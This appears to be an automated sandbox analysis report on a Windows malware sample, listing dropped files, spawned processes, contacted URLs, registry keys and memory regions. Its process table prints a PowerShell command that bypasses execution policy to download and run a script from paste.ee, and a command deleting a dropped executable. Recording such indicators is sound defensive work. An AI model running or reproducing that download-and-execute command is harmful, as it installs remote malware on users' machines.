Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
EwKKdCrEDu.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmza2ul5.lqi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcp3o5hm.dme.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js
|
C++ source, ASCII text, with very long lines (324), with escape sequences
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js.map
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js
|
ASCII text, with very long lines (489)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js.map
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\EwKKdCrEDu.exe
|
"C:\Users\user\Desktop\EwKKdCrEDu.exe"
|
|
|
|
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
|
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv"
) ) )"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/7BWJv
|
188.114.97.3
|
|
|
|
https://paste.ee/
|
unknown
|
|
|
|
https://paste.ee
|
unknown
|
|
|
|
https://github.com/aws/jsii.git
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://github.com/aws/jsii
|
unknown
|
||
|
http://json-schema.org/draft-07/schema#
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://aws.amazon.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://json-schema.org/schema
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://github.com/aws/jsii/issues
|
unknown
|
||
|
https://github.com/jprichardson/node-fs-extra/issues/269
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
|
unknown
|
||
|
http://json-schema.org/draft-07/schema
|
unknown
|
||
|
http://www.microsoft.coD
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3430000
|
heap
|
page read and write
|
||
|
AEF000
|
stack
|
page read and write
|
||
|
1C56000
|
direct allocation
|
page read and write
|
||
|
68AB000
|
stack
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2082000
|
direct allocation
|
page read and write
|
||
|
264D000
|
trusted library allocation
|
page execute and read and write
|
||
|
67AA000
|
stack
|
page read and write
|
||
|
E06000
|
unkown
|
page readonly
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
4200000
|
heap
|
page read and write
|
||
|
2F0000
|
direct allocation
|
page read and write
|
||
|
1C1E000
|
direct allocation
|
page read and write
|
||
|
6C5B000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
46B1000
|
trusted library allocation
|
page read and write
|
||
|
6C30000
|
heap
|
page read and write
|
||
|
22140000
|
direct allocation
|
page read and write
|
||
|
6BCF000
|
heap
|
page read and write
|
||
|
1C58000
|
direct allocation
|
page read and write
|
||
|
700000
|
remote allocation
|
page readonly
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
130B000
|
unkown
|
page read and write
|
||
|
41C0000
|
heap
|
page execute and read and write
|
||
|
133E000
|
unkown
|
page read and write
|
||
|
1C52000
|
direct allocation
|
page read and write
|
||
|
6C51000
|
heap
|
page read and write
|
||
|
1C00000
|
direct allocation
|
page read and write
|
||
|
163E000
|
stack
|
page read and write
|
||
|
222BF000
|
stack
|
page read and write
|
||
|
458E000
|
stack
|
page read and write
|
||
|
1C5C000
|
direct allocation
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
1D16000
|
direct allocation
|
page read and write
|
||
|
22142000
|
direct allocation
|
page read and write
|
||
|
27A2000
|
heap
|
page read and write
|
||
|
2080000
|
direct allocation
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page read and write
|
||
|
686E000
|
stack
|
page read and write
|
||
|
6BE4000
|
heap
|
page read and write
|
||
|
2670000
|
trusted library allocation
|
page read and write
|
||
|
46A0000
|
heap
|
page execute and read and write
|
||
|
2785000
|
heap
|
page read and write
|
||
|
6F00000
|
trusted library allocation
|
page read and write
|
||
|
6E1000
|
remote allocation
|
page execute read
|
||
|
41BF000
|
stack
|
page read and write
|
||
|
7F8E000
|
stack
|
page read and write
|
||
|
355000
|
heap
|
page read and write
|
||
|
1C12000
|
direct allocation
|
page read and write
|
||
|
6F80000
|
trusted library allocation
|
page read and write
|
||
|
1D0C000
|
direct allocation
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
68EE000
|
stack
|
page read and write
|
||
|
254E000
|
stack
|
page read and write
|
||
|
7D4E000
|
stack
|
page read and write
|
||
|
12C6000
|
unkown
|
page read and write
|
||
|
1D04000
|
direct allocation
|
page read and write
|
||
|
2600000
|
heap
|
page read and write
|
||
|
206C000
|
direct allocation
|
page read and write
|
||
|
6B7E000
|
heap
|
page read and write
|
||
|
67EE000
|
stack
|
page read and write
|
||
|
13D0000
|
direct allocation
|
page read and write
|
||
|
2759000
|
heap
|
page read and write
|
||
|
1C82000
|
direct allocation
|
page read and write
|
||
|
2F3C000
|
heap
|
page read and write
|
||
|
1C1C000
|
direct allocation
|
page read and write
|
||
|
96B000
|
unkown
|
page readonly
|
||
|
25CE000
|
stack
|
page read and write
|
||
|
6BF9000
|
heap
|
page read and write
|
||
|
1348000
|
unkown
|
page write copy
|
||
|
6A20000
|
heap
|
page read and write
|
||
|
1D26000
|
direct allocation
|
page read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
2004000
|
direct allocation
|
page read and write
|
||
|
7C8E000
|
stack
|
page read and write
|
||
|
200C000
|
direct allocation
|
page read and write
|
||
|
7D8E000
|
stack
|
page read and write
|
||
|
250E000
|
stack
|
page read and write
|
||
|
E06000
|
unkown
|
page readonly
|
||
|
7A6D000
|
stack
|
page read and write
|
||
|
221BD000
|
stack
|
page read and write
|
||
|
169C000
|
heap
|
page read and write
|
||
|
12BE000
|
unkown
|
page write copy
|
||
|
1D0A000
|
direct allocation
|
page read and write
|
||
|
66D000
|
stack
|
page read and write
|
||
|
1D02000
|
direct allocation
|
page read and write
|
||
|
6EED000
|
stack
|
page read and write
|
||
|
1C5E000
|
direct allocation
|
page read and write
|
||
|
6B9A000
|
heap
|
page read and write
|
||
|
371000
|
unkown
|
page execute read
|
||
|
1CB4000
|
direct allocation
|
page read and write
|
||
|
48F6000
|
trusted library allocation
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
41C5000
|
heap
|
page execute and read and write
|
||
|
2070000
|
direct allocation
|
page read and write
|
||
|
266A000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EBD000
|
stack
|
page read and write
|
||
|
6BDA000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1D12000
|
direct allocation
|
page read and write
|
||
|
6BEB000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
26DE000
|
stack
|
page read and write
|
||
|
1326000
|
unkown
|
page read and write
|
||
|
1C6C000
|
direct allocation
|
page read and write
|
||
|
2016000
|
direct allocation
|
page read and write
|
||
|
13A4000
|
unkown
|
page readonly
|
||
|
48DE000
|
trusted library allocation
|
page read and write
|
||
|
1FD4000
|
direct allocation
|
page read and write
|
||
|
6BDD000
|
heap
|
page read and write
|
||
|
2048000
|
direct allocation
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
1D42000
|
direct allocation
|
page read and write
|
||
|
2018000
|
direct allocation
|
page read and write
|
||
|
1FF2000
|
direct allocation
|
page read and write
|
||
|
271E000
|
stack
|
page read and write
|
||
|
96B000
|
unkown
|
page readonly
|
||
|
2050000
|
direct allocation
|
page read and write
|
||
|
1F88000
|
direct allocation
|
page read and write
|
||
|
413E000
|
stack
|
page read and write
|
||
|
69AF000
|
stack
|
page read and write
|
||
|
2806000
|
heap
|
page read and write
|
||
|
1BD0000
|
heap
|
page read and write
|
||
|
1349000
|
unkown
|
page readonly
|
||
|
1D40000
|
direct allocation
|
page read and write
|
||
|
E7000
|
stack
|
page read and write
|
||
|
2672000
|
trusted library allocation
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
1C68000
|
direct allocation
|
page read and write
|
||
|
2644000
|
trusted library allocation
|
page read and write
|
||
|
1FDE000
|
direct allocation
|
page read and write
|
||
|
1FEA000
|
direct allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CBA000
|
direct allocation
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
12C4000
|
unkown
|
page write copy
|
||
|
672F000
|
stack
|
page read and write
|
||
|
9CD000
|
stack
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
21D3F000
|
stack
|
page read and write
|
||
|
280C000
|
heap
|
page read and write
|
||
|
1C2B000
|
direct allocation
|
page read and write
|
||
|
404C000
|
stack
|
page read and write
|
||
|
130D000
|
unkown
|
page write copy
|
||
|
258E000
|
stack
|
page read and write
|
||
|
371000
|
unkown
|
page execute read
|
||
|
408E000
|
stack
|
page read and write
|
||
|
7CCE000
|
stack
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
1CCE000
|
direct allocation
|
page read and write
|
||
|
498D000
|
trusted library allocation
|
page read and write
|
||
|
7D0D000
|
stack
|
page read and write
|
||
|
12BE000
|
unkown
|
page write copy
|
||
|
1C66000
|
direct allocation
|
page read and write
|
||
|
45CE000
|
stack
|
page read and write
|
||
|
6F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E8E000
|
stack
|
page read and write
|
||
|
1C92000
|
direct allocation
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
1C8C000
|
direct allocation
|
page read and write
|
||
|
1FC2000
|
direct allocation
|
page read and write
|
||
|
6B70000
|
heap
|
page read and write
|
||
|
1FC0000
|
direct allocation
|
page read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
heap
|
page read and write
|
||
|
12C7000
|
unkown
|
page write copy
|
||
|
21FC0000
|
direct allocation
|
page read and write
|
||
|
1E40000
|
direct allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
1C14000
|
direct allocation
|
page read and write
|
||
|
21E7E000
|
stack
|
page read and write
|
||
|
66EE000
|
stack
|
page read and write
|
||
|
6AC000
|
stack
|
page read and write
|
||
|
2630000
|
trusted library allocation
|
page read and write
|
||
|
8FB000
|
heap
|
page read and write
|
||
|
4989000
|
trusted library allocation
|
page read and write
|
||
|
21C3E000
|
stack
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
1CE2000
|
direct allocation
|
page read and write
|
||
|
1ACE000
|
stack
|
page read and write
|
||
|
1FF6000
|
direct allocation
|
page read and write
|
||
|
1CA2000
|
direct allocation
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page read and write
|
||
|
29C8000
|
trusted library allocation
|
page read and write
|
||
|
8AE000
|
stack
|
page read and write
|
||
|
371000
|
unkown
|
page execute read
|
||
|
29F7000
|
heap
|
page read and write
|
||
|
1FD2000
|
direct allocation
|
page read and write
|
||
|
696E000
|
stack
|
page read and write
|
||
|
205E000
|
direct allocation
|
page read and write
|
||
|
1C8E000
|
direct allocation
|
page read and write
|
||
|
1CD0000
|
direct allocation
|
page read and write
|
||
|
56B1000
|
trusted library allocation
|
page read and write
|
||
|
1FB8000
|
direct allocation
|
page read and write
|
||
|
4090000
|
trusted library allocation
|
page read and write
|
||
|
1D1C000
|
direct allocation
|
page read and write
|
||
|
2C2F000
|
stack
|
page read and write
|
||
|
1C16000
|
direct allocation
|
page read and write
|
||
|
12BF000
|
unkown
|
page read and write
|
||
|
6D70000
|
trusted library allocation
|
page read and write
|
||
|
1FBE000
|
direct allocation
|
page read and write
|
||
|
469B000
|
stack
|
page read and write
|
||
|
1C9C000
|
direct allocation
|
page read and write
|
||
|
1D0E000
|
direct allocation
|
page read and write
|
||
|
1D2E000
|
direct allocation
|
page read and write
|
||
|
6FE000
|
remote allocation
|
page execute and read and write
|
||
|
1CE0000
|
direct allocation
|
page read and write
|
||
|
7A10000
|
heap
|
page read and write
|
||
|
1FD8000
|
direct allocation
|
page read and write
|
||
|
1CC2000
|
direct allocation
|
page read and write
|
||
|
32FF000
|
stack
|
page read and write
|
||
|
2659000
|
trusted library allocation
|
page read and write
|
||
|
1C20000
|
direct allocation
|
page read and write
|
||
|
1C40000
|
direct allocation
|
page read and write
|
||
|
21FC4000
|
direct allocation
|
page read and write
|
||
|
86E000
|
stack
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page read and write
|
||
|
1FE0000
|
direct allocation
|
page read and write
|
||
|
2F8000
|
direct allocation
|
page read and write
|
||
|
29C0000
|
trusted library allocation
|
page read and write
|
||
|
1C70000
|
direct allocation
|
page read and write
|
||
|
2010000
|
direct allocation
|
page read and write
|
||
|
1CA4000
|
direct allocation
|
page read and write
|
||
|
48FA000
|
trusted library allocation
|
page read and write
|
||
|
6D80000
|
trusted library allocation
|
page read and write
|
||
|
21D7D000
|
stack
|
page read and write
|
||
|
1C88000
|
direct allocation
|
page read and write
|
||
|
25F6000
|
heap
|
page read and write
|
||
|
1C96000
|
direct allocation
|
page read and write
|
||
|
40FE000
|
stack
|
page read and write
|
||
|
1D00000
|
direct allocation
|
page read and write
|
||
|
2000000
|
direct allocation
|
page read and write
|
||
|
200000
|
heap
|
page read and write
|
||
|
1790000
|
direct allocation
|
page read and write
|
||
|
2064000
|
direct allocation
|
page read and write
|
||
|
2640000
|
trusted library allocation
|
page read and write
|
||
|
1C78000
|
direct allocation
|
page read and write
|
||
|
6F6000
|
remote allocation
|
page readonly
|
||
|
29B0000
|
heap
|
page readonly
|
||
|
3300000
|
heap
|
page read and write
|
||
|
56B9000
|
trusted library allocation
|
page read and write
|
||
|
1C94000
|
direct allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
2074000
|
direct allocation
|
page read and write
|
||
|
1D22000
|
direct allocation
|
page read and write
|
||
|
40B0000
|
heap
|
page read and write
|
||
|
204E000
|
direct allocation
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
1CA6000
|
direct allocation
|
page read and write
|
||
|
1C22000
|
direct allocation
|
page read and write
|
||
|
130E000
|
unkown
|
page read and write
|
||
|
1C86000
|
direct allocation
|
page read and write
|
||
|
31FF000
|
unkown
|
page read and write
|
||
|
1C54000
|
direct allocation
|
page read and write
|
||
|
79C0000
|
heap
|
page read and write
|
||
|
21FBF000
|
stack
|
page read and write
|
||
|
1FDA000
|
direct allocation
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
6DCD000
|
stack
|
page read and write
|
||
|
370000
|
unkown
|
page readonly
|
||
|
1F9E000
|
direct allocation
|
page read and write
|
||
|
6E2C000
|
stack
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
1C0C000
|
direct allocation
|
page read and write
|
||
|
2023000
|
direct allocation
|
page read and write
|
||
|
6B50000
|
trusted library allocation
|
page read and write
|
||
|
1D10000
|
direct allocation
|
page read and write
|
||
|
7E0E000
|
stack
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
1EF6000
|
direct allocation
|
page read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
1FDC000
|
direct allocation
|
page read and write
|
||
|
692E000
|
stack
|
page read and write
|
||
|
6DD0000
|
trusted library allocation
|
page read and write
|
||
|
1C9E000
|
direct allocation
|
page read and write
|
||
|
7DCE000
|
stack
|
page read and write
|
||
|
1C6A000
|
direct allocation
|
page read and write
|
||
|
48E9000
|
trusted library allocation
|
page read and write
|
||
|
1C4B000
|
direct allocation
|
page read and write
|
||
|
2650000
|
trusted library allocation
|
page read and write
|
||
|
6C81000
|
heap
|
page read and write
|
||
|
1FC6000
|
direct allocation
|
page read and write
|
||
|
1E7E000
|
direct allocation
|
page read and write
|
||
|
167D000
|
stack
|
page read and write
|
||
|
6E0000
|
remote allocation
|
page execute and read and write
|
||
|
2675000
|
trusted library allocation
|
page execute and read and write
|
||
|
2006000
|
direct allocation
|
page read and write
|
||
|
1C04000
|
direct allocation
|
page read and write
|
||
|
2029000
|
direct allocation
|
page read and write
|
||
|
1C3E000
|
direct allocation
|
page read and write
|
||
|
2072000
|
direct allocation
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
4207000
|
heap
|
page read and write
|
||
|
2034000
|
direct allocation
|
page read and write
|
||
|
2008000
|
direct allocation
|
page read and write
|
||
|
1690000
|
heap
|
page read and write
|
||
|
1D34000
|
direct allocation
|
page read and write
|
||
|
7F0E000
|
stack
|
page read and write
|
||
|
417E000
|
stack
|
page read and write
|
||
|
1C90000
|
direct allocation
|
page read and write
|
||
|
29E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
2032000
|
direct allocation
|
page read and write
|
||
|
682B000
|
stack
|
page read and write
|
||
|
56D9000
|
trusted library allocation
|
page read and write
|
||
|
1FC4000
|
direct allocation
|
page read and write
|
||
|
1CC4000
|
direct allocation
|
page read and write
|
||
|
2643000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E4E000
|
stack
|
page read and write
|
||
|
6B40000
|
heap
|
page execute and read and write
|
||
|
1C32000
|
direct allocation
|
page read and write
|
||
|
370000
|
unkown
|
page readonly
|
||
|
278A000
|
heap
|
page read and write
|
||
|
1FF0000
|
direct allocation
|
page read and write
|
||
|
1D24000
|
direct allocation
|
page read and write
|
||
|
676E000
|
stack
|
page read and write
|
||
|
7AAE000
|
stack
|
page read and write
|
||
|
1349000
|
unkown
|
page readonly
|
||
|
465D000
|
stack
|
page read and write
|
||
|
1C76000
|
direct allocation
|
page read and write
|
||
|
1C7A000
|
direct allocation
|
page read and write
|
||
|
7FCE000
|
stack
|
page read and write
|
||
|
7C4E000
|
stack
|
page read and write
|
||
|
5716000
|
trusted library allocation
|
page read and write
|
||
|
1D30000
|
direct allocation
|
page read and write
|
||
|
2BDE000
|
unkown
|
page read and write
|
||
|
2690000
|
trusted library allocation
|
page read and write
|
||
|
4806000
|
trusted library allocation
|
page read and write
|
||
|
274D000
|
heap
|
page read and write
|
||
|
1CAC000
|
direct allocation
|
page read and write
|
||
|
2038000
|
direct allocation
|
page read and write
|
||
|
1343000
|
unkown
|
page read and write
|
||
|
2056000
|
direct allocation
|
page read and write
|
||
|
470A000
|
trusted library allocation
|
page read and write
|
||
|
6EAE000
|
stack
|
page read and write
|
||
|
1C80000
|
direct allocation
|
page read and write
|
||
|
1CB7000
|
direct allocation
|
page read and write
|
||
|
AC000
|
stack
|
page read and write
|
||
|
1348000
|
unkown
|
page write copy
|
||
|
2020000
|
direct allocation
|
page read and write
|
||
|
2792000
|
heap
|
page read and write
|
||
|
6E6D000
|
stack
|
page read and write
|
||
|
360000
|
direct allocation
|
page read and write
|
||
|
1D18000
|
direct allocation
|
page read and write
|
||
|
7ECE000
|
stack
|
page read and write
|
||
|
2660000
|
trusted library allocation
|
page read and write
|
||
|
13A4000
|
unkown
|
page readonly
|
||
|
7F4E000
|
stack
|
page read and write
|
||
|
2088000
|
direct allocation
|
page read and write
|
||
|
1BCF000
|
stack
|
page read and write
|
There are 347 hidden memdumps, click here to show them.